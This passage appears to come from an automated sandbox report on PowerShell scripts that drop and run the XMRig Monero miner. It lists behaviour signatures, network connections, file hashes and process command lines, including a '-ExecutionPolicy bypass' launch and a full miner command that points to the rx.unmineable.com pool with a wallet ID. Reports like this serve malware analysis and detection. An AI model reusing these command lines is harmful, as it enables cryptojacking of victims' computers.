N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.154:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 154.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
NL 23.62.61.154:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 25.73.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1cumut5f.tev.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 21:14

Platform

win11-20240426-en

Max time kernel

1797s

Max time network

1791s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/3044-0-0x00007FFB21403000-0x00007FFB21405000-memory.dmp

memory/3044-1-0x000001BB2A430000-0x000001BB2A452000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hhizu1f3.fjf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:38

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1788s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 169.253.116.51.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0slzx3fw.ncq.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3
